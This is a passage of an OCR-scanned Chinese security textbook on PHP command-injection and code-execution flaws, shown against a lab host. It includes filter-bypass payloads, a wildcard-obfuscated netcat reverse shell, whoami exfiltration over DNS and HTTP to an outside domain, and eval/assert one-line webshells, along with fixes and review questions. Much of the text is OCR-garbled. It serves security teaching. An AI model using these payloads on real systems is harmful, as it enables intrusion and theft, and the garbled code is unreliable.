$9commandexec.php 


返回 commandexec. php 的 源码 内 容 , 如 图 5-6 所 示 o 


Load URL  |http;//192.168.91.142/exec/commandexec.php?ip- 127.0.0.1;cat$IFS$9commandexec.php. 


Split URL 
Execute. 


L] Enable Post data [ ] Enable Referrer 


PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data. 

64 bytes from 127.0.0.1: icmp seq-l tt1-64 time-0. 082 ms 
64 bytes from 127.0.0.1: icmp seq-2 ttl-64 time-0.056 ms 
64 bytes from 127.0.0.1: icmp seq-3 ttl=64 time-0.093 ms 


一 127.0.0.1 ping statistics -一 
3 packets transmitted, 3 received, 0% packet loss, time 2000ms 
rtt min/avg/max/mdev = 0. 056/0. 077/0. 093/0. 015 ms 
<?php 

$ip = $ GETI ip']; 


system("ping -c 3 ". $ip); 
2 


7e C TO —- O (0 00 -3 O Oh CO NO e 


5-6 $IFS$9 绕 过 的 返回 结果 


3. 制 表 符 绕 过 
%09 是 制 表 符 的 URL 编码 ,可 以 通过 %09 来 代替 空格 , 绕 过 空格 过 滤 。 
输入 以 下 测试 语句 : 


http://192.168.91.142/exec/commandexec.php? ip=127.0.0.1;cat%09commandexec. 
php 


返回 commandexec. php 的 源码 内 容 , 如 图 5-7 所 示 。 
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Load URL |http//192.168.91.142/exec/commandexec.php?ip-127.0.0.1:cat9&09commandexec.php 


C Enable Post data [] Enable Referrer 


1 PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data. 

2 64 bytes from 127.0.0.1: icmp seq-l ttl=64 time-0.053 ms 
3 64 bytes from 127.0.0.1: icmp_seq=2 ttl-64 time=0. 049 ms 
4 64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time-0.039 ms 
6 


— 127.0.0.1 ping statistics — 
7 3 packets transmitted, 3 received, 0% packet loss, time 1999ms 
8 rtt min/avg/max/mdev = 0. 039/0. 047/0. 053/0. 005 ms 
9 <?php 
$ip = $ GET['ip']; 


system(^ping -c 3 ”. $ip); 
> 


图 5-7 制 表 符 绕 过 的 返回 结果 


4.{ ) 绕 过 
空格 过 滤 可 以 用 {} 绕 过 。 例 如 ， 


[rootef507700ble7d exec]#{cat,commandexec .php} 
«?php 

$ip-$ GET['ip']; 

system("ping -c 3 ". $ip); 
?2 


输入 以 下 测试 语句 : 


http://192.168.91.142/exec/commandexec.php? ip-127.0.0.1; (cat, commandexec. 


php) 


返回 commandexec. php 的 源码 内 容 , 如 图 5-8 所 示 。 


Ñ spit URL 
®© Execute 


Ñ LoadURL |http://192.168.91.142/exec/commandexec.php?ip=127.0.0.1;[cat commandexec.php} 


[O Enable Post data [] Enable Referrer 


1 PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data. 

2 64 bytes from 127.0.0.1: icmp seq-l ttl-64 time=0. 044 ms 
3 64 bytes from 127.0.0.1: icmp seq-2 ttl-64 time-0.052 ms 
4 64 bytes from 127.0.0.1: icmp seq-3 tt1=64 time-0.050 ms 


6 — 127.0.0.1 ping statistics — 
T 3 packets transmitted, 3 received, 0% packet loss, time 2001ms 
8 rtt min/avg/max/mdev = 0. 044/0. 048/0. 052/0. 008 ms 
<?php 
$ip = $ CET['ip']; 


12 system("ping -c 3 ^. $ip); 
13 ?> 


5-8 人)} 绕 过 的 返回 结果 
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5. < 绕 过 
例如 ,可 以 通过 一 绕 过 cat 命令 过 滤 。 


输入 以 下 测试 语句 : 


1 PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data. 

2 64 bytes from 127.0.0.1: icmp seq-l ttl-64 time-0. 044 ms 

3 64 bytes from 127.0.0.1: icmp seq-2 ttl-64 time-0.055 ms 

4 64 bytes from 127.0.0.1: icmp seq-3 tt1-64 time-0.051 ms 

5 

6 一 127.0.0.1 ping statistics — 

7 3 packets transmitted, 3 received, 0% packet loss, time 2000ms 
8 rtt min/avg/max/mdev 7 0. 044/0. 050/0. 055/0. 004 ms 

9 <?php 

|o $ip = $ GETI ip]; 


l system(^ping - 3 ”. fip); 


5-9 去 绕 过 的 返回 结果 


542 ” 绕 过 关键 字 过 滤 


1. 变量 拼接 绕 过 
Linux 支持 变量 赋值 ,可 以 通过 变量 拼接 来 绕 过 过 滤 规 则 。 
例如 ,可 以 使 用 变量 赋值 的 方式 , 绕 过 cat 命令 过 滤 。 


输入 以 下 测试 语句 : 


返回 commandexec. php 的 源码 内 容 , 如 图 5-10 所 示 。 
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ME) LoadURL |http://192.168.91.142/exec/commandexec.php?ip=127.0.0.1;a=c:b=at:$a$b commandexec.php 


Š SplitURL 
(9 Eecute 


[C Enable Post data [ ] Enable Referrer 


1 PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data. 

2 64 bytes from 127.0.0.1: icmp seq-1 tt1-64 time-0.053 ms 
3 64 bytes from 127.0.0.1: icmp seq-2 ttl-64 time-0.053 ms 
4 64 bytes from 127.0.0.1: icmp seq-3 ttl-64 time-0. 044 ms 
5 


6 一 127.0.0.1 ping statistics — 
7 3 packets transmitted, 3 received, 0% packet loss, time 2000ms 
8 rtt min/avg/max/mdev = 0. 044/0. 050/0. 053/0. 004 ms 

9 <?php 

10 $ip = $ GET['ip']; 


12 system("ping -c 3 ^. $ip); 


图 5-10 变量 拼接 绕 过 的 返回 结果 


2. 空 变量 绕 过 
例如 ,可 以 通过 空 变量 绕 过 cat 命令 过 滤 。 
[rootef507700ble7d exec]#ca${x}t commandexec.php 
<?php 

$ip-$ GET['ip']; 

system("ping -c 3 ". $ip); 
?> 


输入 以 下 测试 语句 : 


http://192. 168. 91. 142/exec/commandexec. php?ip = 127. 0. 0. 1; ca $(x) t 
commandexec.php 


返回 commandexec. php 的 源码 内 容 , 如 图 5-11 所 示 。 


du Load URL  |http//192.168.91.1. 42/exec/commandexec.php?ip- 127.0.0.1:ca$(x)t commandexec.php 
Ë split URL 
®© Execute 


C Enable Post data [ ] Enable Referrer 


1 PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data. 

2 64 bytes from 127.0.0.1: icmp seq-l ttl-64 time=0. 048 ms 

3 64 bytes from 127.0.0.1: icmp seq-2 tt1-64 time-0.051 ms 

4 64 bytes from 127.0.0.1: icmp seq-3 tt1-64 time-0.053 ms 

5 

6 — 127.0.0.1 ping statistics — 

7 3 packets transmitted, 3 received, 0% packet loss, time 2001ms 
8 rtt min/avg/max/mdev = 0. 048/0. 050/0. 053/0. 008 ms 


9 <?php 

10 $ip = $ GET[' ip']; 

11 

12 system(“ping -c 3 “.$ip); 
13 2 

14 


图 5-11 空 变量 绕 过 的 返回 结果 
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3. 系统 变量 绕 过 


${SHELLOPTS)} 是 系统 变量 ,可 以 利用 系统 变量 的 字符 拼接 绕 过 过 滤 。 例 如 : 


例如 ,可 以 通过 ${SHELLOPTS: 3: 1)at commandexec. php 绕 过 cat 命令 过 滤 。 


输入 以 下 测试 语句 : 


返回 commandexec. php 的 源码 内 容 , 如 图 5-12 所 示 。 


六 Load URL [httpy/192.168.91.142/exec/commandexec.php7ip=127.0.0.1;${SHELLOPTS:3:1)at commandexec-php 


C Enable Post data [] Enable Referrer 


1 PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data. 

2 64 bytes from 127.0.0.1: icmp seq-1 ttl=64 time=0. 042 ms 

3 64 bytes from 127.0.0.1: icmp seq-2 ttl=64 time-0.053 ms 

4 64 bytes from 127.0.0.1: icmp seq-3 ttl-64 time-0.041 ms 

5 

6 一 127.0.0.1 ping statistics — 

7 3 packets transmitted, 3 received, 0% packet loss, time 2001ms 
8 rtt min/avg/max/mdev = 0. 041/0. 045/0. 053/0. 007 ms 

9 


<?php 
10 $ip = $ GET['ip']; 
1 


12 system(^ping -c 3 ^. $ip); 


5-12. 系统 变量 绕 过 的 返回 结果 


4.\ 绕 过 
例如 ,可 以 通过 c\a\t commandexec. php 绕 过 cat 命令 过 滤 。 


mum 186 m 


m 第 5 章 命令 执行 漏洞 。 “wm 


system("ping " .Sip) 7 
€x 


输入 以 下 测试 语句 : 


http://192. 168. 91. 142/exec/commandexec. php?ip = 127. 0. 0. 1; c Na Nt 
Ccommandexec.php 


返回 commandexec. php 的 源码 内 容 , 如 图 5-13 所 示 。 


E Load URL [http://192.168.91.142/exec/commandexec.php?ip=127.0.0.1;c\a\t commandexec.php 
& Split URL 
@ Execute 


O Enable Post data  [ ] Enable Referrer 


1 PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data. 

2 64 bytes from 127.0.0.1: icmp seq-l tt1-64 time-0.272 ms 
3 64 bytes from 127.0.0.1: icmp seq-2 ttl-64 time-0.053 ms 
4 64 bytes from 127.0.0.1: icmp seq-3 tt1-64 time-0.042 ms 


6 一 127.0.0.1 ping statistics — 
7 3 packets transmitted, 3 received, 0% packet loss, time 2001ms 
8 rtt min/avg/max/ndev = 0. 042/0. 122/0. 272/0. 106 ms 
9 <?php 
10 $ip = t €ET['ip']; 
11 
12 system(“ping -c 3 “. $ip); 
13 2 
14 


图 5-13 \ 绕 过 的 返回 结果 


5. 通配符 绕 过 

Linux 支持 利用 通配符 进行 字符 匹配 。 通 配 符 的 作用 是 在 模糊 查询 时 表示 文件 名 中 
某 些 不 确定 的 字符 。 

通配符 规则 如 下 : 

。 * 代表 0 到 多 个 任意 字符 。 

。 ? 代表 一 个 任意 字符 。 

。 口内 为 字符 范围 ,代表 该 字符 范围 中 的 任 一 一 个 字符 。 

例如 ,要 查询 当前 目录 下 扩展 名 是 . php 的 文件 ,可 以 用 * . php 来 查询 。 


[rootef507700ble7d exec]#1s * .php 
commandexec.php commandexe.php 


又 如 ,对 于 /etc/passwd 文件 过 滤 ,可 以 利用 /???/???sw? 来 绕 过 。 


[root8819d5a07b39f exec]#cat /??? /?2?2? sw? 
root:x:0:0:root:/root:/bin/bash 
bin:x:1:1:bin:/bin:/sbin/nologin 
daemon:x:2:2:daemon:/sbin:/sbin/nologin 
adm:x:3:4:adm: /var/adm:/sbin/nologin 
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本 人 :lp:/var/spool/lpd:/sbin/nologin 
sync:x:5:0:sync:/sbin:/bin/sync 


输入 以 下 测试 语句 : 


http://192.168.91.142/exec/commandexec.php? ip=127.0.0.1;cat /???/???sw? 


通配符 绕 过 的 返回 结果 如 图 5-14 所 示 。 


Ñ LoadURL |http://192.168.91.142/exec/commandexec.php?ip=127.0.0.1;cat /???/???sw? 
Ñ Split URL 
®© Execute 


[I] Enable Post data [ ] Enable Referrer 


3 packets transmitted, 3 received, 0% packet loss, time 2000ms 

8 rtt min/avg/max/mdev = 0.044/0. 052/0. 061/0. 009 ms 

9 root:x:0:0:root:/root:/bin/bash 

/bin:/sbin/nologin 

laemon: /sbin: /sbin/nologin 

/var/adm: /sbin/nologin 

'var/spool/1pd:/sbin/nologin 

ync : /sbin: /bin/sync 

shutdown: /sbin: /sbin/shutdown 

alt:/sbin:/sbin/halt 

17 mail:x:8:12:mail:/var/spool/mail:/sbin/nologin 

:uucp: /var/spool/uucp: /sbin/nologin 

operator: /root:/sbin/nologin 

00: games: /usr/games: /sbin/nologin 

:gopher: /var/gopher: /sbin/nologin 

22 ftp:x:14:50:FTP User:/var/ftp: /sbin/nologin 

3 :Nobody:/:/sbin/nologin 

irtual console memory owner:/dev:/sbin/nologin 
99:76:Saslauthd user:/var/empty/saslauth:/sbin/nologin 
148:Apache: /var/www: /sbin/nologin 

MySQL Server:/var/lib/mysql:/bin/bash 
Privilege-separated SSH:/var/empty/sshd:/sbin/nologin 
2 home/testu: /bin/bash 

L20 walk:x:501:501::/home/walk:/bin/besh 0] 
5-14 通配符 绕 过 的 返回 结果 


6. shell 反弹 绕 过 
在 利用 shell 反弹 进行 攻击 时 ,如 果 存 在 过 滤 , 可 以 通过 通配符 来 绕 过 过 滤 , 执 行 命 
令 。 例 如 ,要 执行 以 下 命令 : 


/bin/nc 192.168.91.135 8888 -e /bin/bash 


首先 将 IP 地 址 转换 为 十 进 制 : 
192X256: 十 168X2562? 十 91X256 十 135X1 一 3232258951 


然后 用 通配符 替换 关键 字 : 


/b? ? /? c 3232258951 8888 -e /?2? ? /b??h 


在 靶 机 中 发 送 以 下 payload: 
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root@ubuntu:~#/b??/?c 3232258951 8888 -e /??2?/b??h 


客户 端 接收 到 反弹 回来 的 shell, 并 且 正 常 执行 命令 。 


root@kali:~#nc -lvvp 8888 

listening on [any] 8888 ... 

connect to [192.168.91.135] from kali [192.168.91.108] 57158 
id 

uid=0 (root) gid-0 (root) groups-0 (root) 


3232258951 的 十 六 进 制 是 0xCOA85B87。 也 可 以 用 /b??/?c OxCOASSB87 8888 -e 
/???/b??h 的 形式 绕 过 过 滤 。 

7. Base64 编码 绕 过 

利用 系统 函数 base64 对 命令 进行 Base64 编码 ,以 绕 过 过 滤 。 例 如 ,id 命令 的 Base64 
编码 为 aWQ= ,再 利用 base64 -d 对 aWQ 二 进行 解码 ,这 样 就 绕 过 了 过 滤 ,并 且 正 常 执行 
了 命令 。 


root@ubuntu:~# echo "aWQ-" |base64 -d` 
uid=0 (root) gid-0 (root) groups-0 (root),999 (docker) 


输入 以 下 测试 语句 : 


http://192.168. 91. 142/exec/commandexec.php? ip= 127.0.0.1; "echo "aWQ-"| 
base64 -d` 


Base64 编码 绕 过 的 返回 结果 如 图 5-15 所 示 。 


Load URL  |http.///192.168.91.142/exec/commandexec.php?ip- 127.0.0.1; echo "aWQ="|base64 -d` 
Split URL 
Execute. 


C Enable Post data [] Enable Referrer 


1 PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data. 

) 64 bytes from 127.0.0.1: icmp seq-l ttl-64 time-0.074 ms 

3 64 bytes from 127.0.0.1: icmp seq-2 ttl-64 time-0. 094 ms 

4 64 bytes from 127.0.0.1: icmp seq-3 ttl-64 time-0.054 ms 

6 — 127.0.0.1 ping statistics — 

7 3 packets transmitted, 3 received, 0% packet loss, time 1999ms 
8 rtt min/avg/max/mdev = 0. 054/0. 074/0. 094/0. 016 ms 

9 uid=501 (walk) gid-50l(walk) groups=501 (walk) 


5-15 Base64 编码 绕 过 的 返回 结果 


8. expr 和 awk 绕 过 

通过 expr 和 awk 命令 从 其 他 的 文件 中 获取 字符 并 进行 命令 构造 。 

例如 ,ctfs-wiki 文件 的 内 容 为 字符 串 www. ctfs-wiki. com, 通 过 以 下 命令 可 以 获取 
ctfs-wiki 文件 中 存储 的 第 一 个 字符 w。 
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root@ubuntu:~#expr substr $(awk NR-1 ctfs-wiki) 11 
w 


9. 无 回 显 的 命令 执行 

如 果 存 在 命令 执行 漏洞 ,但 是 没有 回 显 , 可 以 通过 shell 反弹 的 方式 将 shell 反弹 到 
vps 上 ,然后 通过 vps 执行 命令 。 如 果 无 法 反弹 shell, 也 可 以 通过 DNS 管道 解析 的 方式 
获取 命令 的 执行 结果 。 

在 Linux 系统 中 ,以 下 两 个 命令 都 可 以 获取 用 户 名 : 


curl test.ctfs-wiki.com/'"whoami" 
ping -c 1 "whoami'.test.ctfs-wiki.com 


在 Windows 系统 中 ,可 以 用 以 下 命令 获取 计算 机 名 : 

for /F $x in ('whoami') do start http://test.ctfs-wiki.com/&x 

可 以 用 以 下 命令 获取 用 户 名 : 

for /F "delims=\ tokens-2" $i in ('whoami') do ping -n 1 $i.test.ctfs-wiki.com 
在 网 站 上 执行 如 下 命令 就 可 以 获取 用 户 名 root: 

curl "http://test.ctfs-wiki.com/? ‘whoami. 


通过 DNS 管道 获取 用 户 名 的 结果 如 图 5-16 所 示 o 


DNSLog | WebLog 


大 path ip ua 


43 test ctfs-wiki.com/?root [ curl7.47.0 


clear | 1 


5-16 通过 DNS 管道 获取 用 户 名 的 结果 


常用 的 开源 DNSLog 平台 如 下 : 
e http://ceye. io/ 。 
e https://github. com/BugScanTeam/DNSLog, 
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5.5.1 服务 器 配置 修复 
可 以 通过 PHP 配置 文件 中 的 disable functions 禁用 敏感 函数 来 修复 命令 执行 漏洞 。 
5.5.2 ”函数 过 滤 


1. escapeshellarg 函数 
escapeshellarg 函数 把 字符 串 转 码 为 可 以 在 shell 命令 里 使 用 的 参数 ,以 过 滤 命令 中 
的 参数 。 其 用 法 如 下 : 


string escapeshellarg (string $arg) 


escapeshellarg 函数 给 字符 串 增 加 一 个 单 引 号 ,并 且 能 引用 或 者 转 义 任何 已 经 存在 的 
单 引号 ,这 样 可 以 直接 将 一 个 字符 串 传 人 shell 函数 ,并 且 可 以 确保 它 是 安全 的 。 对 于 用 
户 输入 的 参数 就 应 该 使 用 这 个 函数 。shell 函数 包含 exec() ，system() 执行 运算 符 。 
通过 escapeshellarg 函数 对 示例 代码 进行 修复 : 


«?php 

$ip=$ GET['ip']; 

system("ping -c 3 ".escapeshellarg($ip)); 
?> 


输入 正常 参数 ,可 以 正常 返回 结果 ,如 图 5-17 所 示 。 


€ © view-sourcehttp//192.168.91.142:8080/index php?ip-127.0.0.1 


PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data. 

64 bytes from 127.0.0.1: icmp seq-l tt1-64 time=0. 062 ms 
64 bytes from 127.0.0.1: icmp seq72 ttl-64 time-0.052 ms 
64 bytes from 127.0.0.1: icmp seq-3 tt1-64 time-0.046 ms 


一 127.0.0.1 ping statistics — 
3 packets transmitted, 3 received, 0% packet loss, time 2001ms 
rtt min/avg/max/mdev = 0. 046/0. 053/0. 062/0. 008 ms 


5-17. 输入 正常 参数 时 正常 返回 结果 (1) 


输入 恶意 攻击 参数 ,不 能 正常 返回 结果 ,如 图 5-18 Pro 


192.168.91.142:8080/index.php?ip=127.0.0.1|lid 


5-18 输入 恶意 攻击 参数 时 不 能 正常 返回 结果 (1) 
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2. escapeshellcmd 函数 
escapeshellemd 函数 可 以 对 shell 元 字符 进行 转 义 ,过 滤 命 令 。 其 用 法 如 下 : 


string escapeshellcmd (string $command) 


escapeshellemd 函数 对 字符 串 中 可 能 会 欺骗 shell 执行 恶意 命令 的 字符 进行 转 义 。 
此 函数 保证 用 户 输入 的 数据 在 传送 到 system 函数 或 者 执行 操作 符 之 前 被 转 义 。 
escapeshellemd 函数 会 在 以 下 字符 之 前 插入 反 斜 线 (\): & #.; lh x .?2.—.<. 
SAGAER GJ $ .N-Nx0A 和 \xFF。' 和 " 仅 在 不 配对 的 时 候 被 转 义 。 在 Windows 平 
台 上 ,上 面 的 所 有 字符 以 及 % 和 ! 字符 都 会 被 空格 代替 。 
通过 escapeshellemd 函数 对 示例 代码 进行 修复 : 
«?php 
$ip =$ GET['ip']; 
system(escapeshellcmd ("ping -c 3 ".$ip)); 
z> 


输入 正常 参数 ,可 以 正常 返回 结果 ,如 图 5-19 所 示 。 


€ © view-source:http://192.168.91.142:8080/index.php?ip=127.0.0.1 


PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data. 

64 bytes from 127.0.0.1: icmp_seq=1 ttl-64 time=0.062 ms 
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.052 ms 
64 bytes from 127.0.0.1: icmp_seq=3 ttl-64 time=0. 046 ms 


一 127.0.0.1 ping statistics — 


3 packets transmitted, 3 received, 0% packet loss, time 2001ms 
rtt min/avg/max/mdev = 0. 046/0. 053/0. 062/0. 008 ms 


图 5-19 输入 正常 参数 时 正常 返回 结果 (2) 


输入 恶意 攻击 参数 ,不 能 正常 返回 结果 ,如 图 5-20 所 示 。 


192.168.91.142:8080/index php?ip=127.0.0.1|lid 


5-20 输入 恶意 攻击 参数 时 不 能 正常 返回 结果 (2) 


“5.6 思考 题 


1. 什么 是 命令 执行 漏洞 ? 它 的 危害 有 哪些 ? 
2. PHP 语言 中 常见 的 命令 执行 函数 有 哪些 ? 
3. Windows 下 的 命令 连接 符 有 哪些 ? 
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. Linux 下 的 命令 连接 符 有 哪些 ? 

. 命令 执行 漏洞 利用 绕 过 空格 过 滤 的 方式 有 哪些 ? 

. 命令 执行 漏洞 利用 绕 过 关键 字 过 滤 的 方式 有 哪些 ? 

. 如 何 获得 存在 命令 执行 漏洞 的 无 回 显 命令 的 执行 结果 ? 
. 命令 执行 漏洞 的 修复 方法 有 哪些 ? 
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31 代码 执行 漏洞 简介 


有 的 应 用 程序 中 提供 了 一 些 可 以 将 字符 串 作 为 代码 执行 的 函数 ,例如 PHP 中 的 eval 
函数 ,可 以 将 该 函数 中 的 参数 当 作 PHP 代码 来 执行 。 如 果 对 这 些 函 数 的 参数 控制 不 严 
格 ,就 可 能 会 被 攻击 者 利用 ,执行 恶意 代码 。 

下 面 介绍 常见 代码 执行 函数 。 


1. eval 函数 
eval 函数 把 字符 串 作 为 PHP 代码 执行 。 其 用 法 如 下 : 


eval (string $code) 
eval 函数 示例 代码 如 下 : 


<?php @eva1 ($ POST[1])?> 


此 代码 为 常见 的 一 句 话 木马 的 代码 , 它 通过 POST 参数 执行 phpinfo 函数 ,如 图 6-1 所 示 。 


http;//192.168.91.142:8080/index.php. 


6-1 eval 函数 执行 phpinfo 函数 的 结果 


2. assert 函数 
assert 函数 检查 一 个 断言 是 否 为 FALSE。 其 用 法 如 下 : 


bool assert (mixed $assertion[, Throwable $exception]) 


assert 函数 会 检查 指定 的 assertion 并 在 结果 为 FALSE 时 采取 适当 的 行动 。 如 果 
assertion 是 字符 串 E assert 函数 当 作 PHP 代码 来 执行 。 
assert 函数 的 示例 代码 如 下 : 


<?php @assert ($ POST[1])?> 


此 代码 为 一 名 话 木 马 的 变形 代码 , 它 通过 POST 参数 执行 了 phpinfo 函数 ,如 图 6-2 所 示 。 


http;//192.168.91.142:8080/index php. 


图 6-2 assert 函数 执行 phpinfo 函数 的 结果 


3. call user func 函数 

call user. func 函数 把 第 一 个 参数 作为 回调 函数 调用 。 其 用 法 如 下 : 

mixed call user func (callable $callback[, mixed $parameter[, mixed $parameter...]]) 
第 一 个 参数 callback 是 被 调用 的 回调 函数 ,其 余 参数 是 回调 函数 的 参数 。 

call user func 函数 示例 代码 如 下 : 


<?php call user func($ POST['fun'], $ POST['arg']);?> 


此 代码 为 一 句 话 木马 的 变形 代码 ,通过 POST 型 fun 参数 调用 了 system 函数 ,通过 
POST 型 arg 参数 传人 id 命令 ,执行 了 system('id') ,返回 当前 用 户 的 信息 ,如 图 6-3 所 示 。 


4. call user func array 函数 
call user func array 函数 把 第 一 个 参数 作为 回调 函数 调用 ,把 参数 数组 作为 回调 函 
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Q LoadURL [http//192.168.91.142/code/ 
Ñ Spitun. 
®© Execute 


回 Enable Post data [7] Enable Referrer 
Post data funzsystem&arg-id| 


uid-501(walk) gid-501(walk) groups-501(walk) 


图 6-3 call user func 函数 的 执行 结果 
数 的 参数 传人 。 其 用 法 如 下 : 
mixed call user func array (callable $callback, array $param arr) 
call user func array 函数 示例 代码 如 下 : 
<?php call user func array($ POST['fun'], $ POST['arg']);?» 


此 代码 为 一 句 话 木马 的 变形 代码 ,通过 POST 型 fun 参数 调用 了 system 函数 ,通过 POST 
型 arg 参数 传人 id 命令 ,执行 了 systemCid) ,输出 系统 当前 用 户 的 信息 ,如 图 6-4 所 示 。 


http//192.168.91.142/code/ 


[7] Enable Post data 
funzsystem&arg-id| 


uid-501(walk) gid-501(walk) groups-501(walk) 


图 6-4 call user. func array 函数 的 执行 结果 


5. create function 函数 


create function 函数 根据 传递 的 参数 创建 匿名 函数 ,并 为 该 匿名 函数 返回 唯一 名 称 。 
其 用 法 如 下 : 


string create function(string $args, string $code) 


create function 函数 示例 代码 如 下 : 


«?php 

$id-$ GET['id']; 

$code-'echo '.$func.'test'.$id.';'; 
create function ('$func', $code); 

Qu 


create function 函数 会 创建 虚拟 函数 ,转变 成 如 下 代码 : 
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<?php 

$id=$ GET['id']; 

function func($func) ( 
echo "test".$id; 


e 


当 记 传人 的 值 为 1; }phpinfo();/* 时 ,就 可 以 造成 代码 执行 ,如 图 6-5 所 示 。 


http://192.168.91.142:8080/index.php?id=1;:)phpinfo0:/" 


6-5 create function 函数 的 执行 结果 


6. array map 函数 
array map 函数 为 数组 的 每 个 元 素 应 用 回调 函数 。 其 用 法 如 下 : 


array array map (callable $callback, array S$array1[, array $array2...]) 


array map 函数 返回 为 每 个 数组 元 素 应 用 callback 函数 之 后 的 数组 。callback 函数 
形 参 的 数量 和 传 给 array_map 函数 的 数组 的 数量 必须 相同 。 
array map 函数 示例 代码 如 下 : 


«?php 

$func=$ GET['func']; 
Sargv-$ GET['argv']; 
Sarray[0]-$argv; 

array map ($func, $array); 
TE 


输入 以 下 测试 语句 : 
http://192.168.91.142:8080/index.php? func-system&argv-id 
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就 可 以 执行 任意 代码 ,如 图 6-6 所 示 。 


Ë Split URL 


4E) LoadURL |http//192.168.91.142/code/index.php?func-system&argv-id 
®© Execute 


C Enable Post data [] Enable Referrer | 


uid-501(walk) gid-501(walk) groups-501(walk) | 


图 6-6 array map 函数 的 执行 结果 


7. preg_replace 函数 
preg_replace 函数 执行 一 个 正则 表达 式 的 搜索 和 替换 。 其 用 法 如 下 : 
mixed preg_replace (mixed $pattern, mixed $replacement, mixed $subject[, int $ 
limit--1[,int &$count]]) 
preg_replace 函数 搜索 subject 中 匹配 pattern 的 部 分 ,以 replacement 进行 替换 。 
preg_replace 函数 示例 代码 如 下 : 
«?php 
$subject-'hello hack'; 
$pattern-'/hack/'; 
$replacement-$ GET["name"]; 


echo preg_replace ($pattern, $replacement, $subject); 
?> 


输入 以 下 测试 语句 : 
http://192.168.91.142:8080/index.php? name-tom 


preg_replace 函数 会 将 hack 替换 成 tom, 输 出 hello tom, 如 图 6-7 所 示 。 


(E) Load URL [http://192.168.91.142:8080/index.php?name=tom 
Ñ Split URL 
®© Execute 
Enable Post data [ ] Enable Referrer 
hello tom 


6-7 preg_replace 函数 的 执行 结果 


preg_replace 函数 存在 模式 修饰 符 , 其 中 ,修饰 符 e 会 让 preg_replace RAOK RJ 
的 字符 串 作 为 PHP 代码 评估 执行 (以 eval 函数 方式 ) 。 


e (PREG REPLACE EVAL) 
Warning:This feature was DEPRECATED in PHP 5.5.0, and REMOVED as of PHP 7.0.0. 


如 果 设 置 了 这 个 被 弃 用 的 修饰 符 ,preg_replace 函数 对 蔡 换 字符 串 进 行 后 向 引用 替 
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换 之 后 , 将 蔡 换 后 的 字符 串 作为 PHP 代码 评估 执行 (以 eval 函数 方式 ) ,并 使 用 执行 结果 
作为 实际 参与 蔡 换 的 字符 串 。 单 引号 、 双 引号 、 反 斜 线 (\) 和 null 字符 在 后 向 引用 替换 时 
会 被 自动 加 上 反 斜 线 转 义 。 

preg_replace 函数 示例 代码 如 下 : 


«?php 

$subject-'hello hack'; 

$pattern-'/hack/e'; 

$replacement-$ GET["name"]; 

echo preg_replace ($pattern, $replacement, $subject); 
TE 


输入 以 下 测试 语句 : 


http://192.168.91.142:8080/index.php? name-phpinfo() 


会 将 hack 蔡 换 成 phpinfo() ,因为 有 ee 修饰 符 ,会 将 phpinfo() 当 作 代 码 执行 ,如 图 6-8 所 示 。 


http;//192.168.91.142:8080/index.php?name-phpinfo() x 
+ 


Enable Post data Enable Referrer 


6-8 preg_replace 函数 的 执行 结果 


62 PHP 可 变 函 数 


PHP 支持 可 变 函数 的 概念 : 如 果 一 个 变量 名 后 有 圆 括 号 ,PHP 将 寻找 与 变量 的 值 同 
名 的 函数 ,并 且 尝 试 执行 它 。 这 就 意味 着 在 PHP 中 可 以 把 函数 名 通过 字符 串 的 方式 传 
递 给 一 个 变量 ,然后 通过 此 变量 动态 地 调用 函数 。 

PHP 可 变 函 数 示例 代码 如 下 : 


<?php 
function foo() { 
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虽然 PHP 可 变 函 数 给 开发 人 员 带 来 了 极 大 的 便利 ,但 同时 也 带 来 了 极 大 的 安全 隐 
患 , 如 果 函 数 的 名 称 可 以 被 用 户 控制 ,而 且 没 有 做 好 过 滤 ,就 可 能 会 造成 恶意 函数 的 执行 。 
PHP 可 变 函 数 漏洞 示例 代码 如 下 : 


输入 以 下 测试 语句 : 


图 6-9 输入 func—foo 的 返回 结果 


mum 200 = 
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但 是 输入 以 下 测试 语句 : 


会 执行 phpinfo 函数 ,造成 恶意 函数 的 执行 ,如 图 6-10 所 示 。 


图 6-10 输入 func— phpinfo 的 返回 结果 


上 面 的 案例 只 是 执行 了 phpinfo 函数 ,而 没有 造成 太 大 的 影响 。 但 是 在 下 面 的 代码 
中 ,不 仅 函 数 可 变 , 其 中 的 参数 也 可 控 , 这 样 就 会 造成 极 大 的 影响 。 


输入 以 下 测试 语句 : 


会 调用 echoit 函数 ,返回 test, 如 图 6-11 所 示 。 


mum 201 = 
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Load URL  [http//192.168.91.142:8080/index php?func -echoit&string--tesi 
Split URL 
Execute. 


[LT ] 


Enable Post data Enable Referrer 


test 


图 6-11 输入 func— echoit&.string= test 的 返回 结果 
输入 以 下 测试 语句 : 
http://192.168.91.142:8080/?func=system&string=id 


会 调用 system 函数 ,执行 系统 命令 id, 返 回 当 前 用 户 的 信息 ,如 图 6-12 所 示 。 


WE Load URL [http//192.168.91.142/code/?func-system&string-id 
Split URL 
®© Execute 


C Enable Post data [] Enable Referrer 


uid=501(walk) gid=501(walk) groups-501(walk) uid=501(walk) gid=501(walk) groups-501(walk) 


图 6-12 输入 func=systemë.string= id 的 返回 结果 


63 思考 题 


. 什么 是 代码 执行 漏洞 ? 它 有 哪些 危害 ? 

. 简 述 PHP 中 call user func 函数 的 使 用 方法 。 

. PHP 中 执行 代码 的 函数 有 哪些 ? 

简 述 create function 函数 的 使 用 方法 。 

简 述 preg_replace 函数 的 使 用 方法 及 如 何 利用 它 执行 命令 。 
. 简 述 PHP 可 变 函 数 的 原理 及 漏洞 利用 方式 。 


aon £ ç r = 
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7a XSS 漏洞 简介 


XSS(Cross-Site Scripting) 意 为 跨 站 脚本 攻击 。 为 了 不 与 层 伙 样式 表 (Cascading 
Style Sheets, CSS) 的 缩写 混淆 , 故 将 跨 站 脚本 攻击 缩写 为 XSS。XSS 漏洞 是 一 种 在 Web 
